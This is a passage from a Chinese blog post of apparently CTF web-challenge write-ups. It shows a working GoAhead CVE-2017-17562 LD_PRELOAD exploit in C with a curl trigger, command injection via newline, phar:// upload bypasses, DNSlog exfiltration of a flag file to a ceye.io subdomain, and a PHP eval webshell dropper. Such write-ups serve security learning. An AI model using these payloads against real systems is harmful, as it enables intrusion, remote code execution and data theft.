<h4 id="GOGOGO"><a href="#GOGOGO" class="headerlink" title="GOGOGO"></a>GOGOGO</h4><ul>
<li><a href="http://www.freebuf.com/vuls/158089.html" target="_blank" rel="external">GoAhead远程命令执行漏洞(CVE-2017-17562)</a></li>
</ul>
<p>找到一个直接出flag的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">#include &quot;stdio.h&quot;  </div><div class="line">#include &lt;unistd.h&gt;</div><div class="line">#include &lt;stdlib.h&gt;</div><div class="line">#include &lt;sys/socket.h&gt;</div><div class="line">#include &lt;netinet/in.h&gt;</div><div class="line">static void before_main(void) __attribute__((constructor));</div><div class="line">static void before_main(void)&#123;</div><div class="line">char filename[] = &quot;/var/www/goahead/cgi-bin/hello.cgi&quot;; </div><div class="line">     FILE *fp; </div><div class="line">     char StrLine[1024];            </div><div class="line">     if((fp = fopen(filename,&quot;r&quot;)) == NULL) </div><div class="line">     &#123; </div><div class="line">         printf(&quot;error!&quot;);</div><div class="line">     &#125; </div><div class="line">     while (!feof(fp)) </div><div class="line">     &#123; </div><div class="line">         fgets(StrLine,1024,fp);  </div><div class="line">         printf(&quot;%s\n&quot;, StrLine); </div><div class="line">     &#125; </div><div class="line">     fclose(fp);                     </div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p><code>gcc -shared -fPIC ./poc.c -o poc.so</code></p>
<p><code>curl -X POST --data-binary @poc.so http://ip/cgi-bin/hello.cgi?LD_PRELOAD\=/proc/self/fd/0 -i</code></p>
<h4 id="新瓶装旧酒"><a href="#新瓶装旧酒" class="headerlink" title="新瓶装旧酒"></a>新瓶装旧酒</h4><ul>
<li>解析漏洞lll.Php.png，大写绕过</li>
<li>压缩成zip</li>
</ul>
<h4 id="ping也能把你ping挂"><a href="#ping也能把你ping挂" class="headerlink" title="ping也能把你ping挂"></a>ping也能把你ping挂</h4><ul>
<li>绕过管道符<code>ping.php?ip=127.0.0.1%0als</code> 列目录找到上传点</li>
<li>伪协议文件包含1.php压缩成1.zip，上传时改成1.png访问<code>p=phar://upload/随机数_1.png/1</code></li>
<li>mt_srand(seed)和mt_rand()在seed相同时产生随机数相同，爆破出seed就找到文件了</li>
</ul>
<h4 id="Ping"><a href="#Ping" class="headerlink" title="Ping"></a>Ping</h4><ul>
<li><p>扫出两个文件，可执行但无回显，过滤&gt;防止弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">&lt;?php include (&quot;where_is_flag.php&quot;);</div><div class="line">echo &quot;ping&quot;;</div><div class="line">$ip = (string)$_GET[&apos;ping&apos;];</div><div class="line">$ip = str_replace(&quot;&gt;&quot;, &quot;0.0&quot;, $ip);</div><div class="line">system(&quot;ping &quot; . $ip);</div></pre></td></tr></table></figure>
</li>
<li><p>注册个404telnet账号登<a href="http://ceye.io" target="_blank" rel="external">ceye</a> （这个平台拥有自己的HTTP和DNS服务器，可以记录用户域名的所有请求）使用DNSlog进行RCE</p>
</li>
<li><p>到profile里找到Identifier</p>
</li>
<li><p><code>?ping=cat where_is_flag.php|sed s/[[:space:]]//g.xxx.ceye.io</code> 过滤空格输出</p>
</li>
</ul>
<h4 id="进击的盲注"><a href="#进击的盲注" class="headerlink" title="进击的盲注"></a>进击的盲注</h4><p>emmmm首先它数据库连不上了，所以看wp直接访问./uP10@d_nEw.php到上传页面</p>
<ul>
<li>盲注用binary因为order by无法区分大小写</li>
<li>上传用.php.jpg绕过，直接看uploads目录看别人的都行。。</li>
<li>虽然讲道理用的条件竞争，用 <code>&lt;?php file_put_contents(&#39;shell.php&#39;,&#39;&lt;?php eval($_POST[1]);?&gt;&#39;);?&gt;</code> 这样的访问到就能生成shell</li>
</ul>

        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2017/12/31/new/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2017/09/09/php/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>



                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(/img/sidebar_header.png);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="/img/2.png" alt="铃落's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        ringfall3@gmail.com
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="#" target="_blank" title="Email Me">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">email</i>
                        
                        Email Me
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2018/12/">十二月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/11/">十一月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/10/">十月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/09/">九月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/08/">八月 2018<span class="sidebar_archives-count">2</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/07/">七月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/06/">六月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/05/">五月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/04/">四月 2018<span class="sidebar_archives-count">6</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/03/">三月 2018<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/02/">二月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2018/01/">一月 2018<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/12/">十二月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/10/">十月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/09/">九月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/08/">八月 2017<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/07/">七月 2017<span class="sidebar_archives-count">4</span></a>
            </ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/Blog/">Blog<span class="sidebar_archives-count">14</span></a></li><li><a class="sidebar_archives-link" href="/categories/Diary/">Diary<span class="sidebar_archives-count">11</span></a>
            </ul>
        </li>
        
    

    <!-- Pages  -->
    

    <!-- Article Number  -->
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->

    <div class="sidebar-divider"></div>


<!-- Theme Material -->

    <a href="https://github.com/viosey/hexo-theme-material"  class="sidebar-footer-text-a" target="_blank">
        <div class="sidebar-text mdl-button mdl-js-button mdl-js-ripple-effect sidebar-footer-text-div" data-upgraded=",MaterialButton,MaterialRipple">
            主题 - Material
            <span class="sidebar-badge badge-circle">i</span>
        </div>
    </a>


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    

                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    

                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    
        <a href="https://twitter.com/twitter" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-twitter">
                <span class="visuallyhidden">Twitter</span>
            </button><!--
     --></a>
    

    <!-- Facebook -->
    
        <a href="https://www.facebook.com/facebook" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-facebook">
                <span class="visuallyhidden">Facebook</span>
            </button><!--
     --></a>
    

    <!-- Google + -->
    
        <a href="https://www.google.com/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-gplus">
                <span class="visuallyhidden">Google Plus</span>
            </button><!--
     --></a>
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    

    <!-- Telegram -->
    

    <!-- V2EX -->
    

    <!-- Segmentfault -->
    
</div>


        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©&nbsp;<span year></span>&nbsp;RingFa1l
            
        </div>

        <!-- Paradox Footer Right Section -->

        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)

        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->

        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>


                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","/js/lazyload.min.js?1BcfzuNXqV+ntF6gq+5X3Q==", true)</script>



    <script>lsloader.load("js_js","/js/js.min.js?Bn9UzEm8RrBSxqyZB0zPjA==", true)</script>



    <script>lsloader.load("np_js","/js/nprogress.js?pl3Qhb9lvqR1FlyLUna1Yw==", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>













<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    var copyrightNow = new Date().getFullYear();
    var textContent = document.querySelector('span[year]')

    copyrightSince = 0000;
    if (copyrightSince === copyrightNow||copyrightSince === 0000) {
        textContent.textContent = copyrightNow
    } else {
        textContent.textContent = copyrightSince + ' - ' + copyrightNow
    }

    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.6 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        </body>
    
</html>
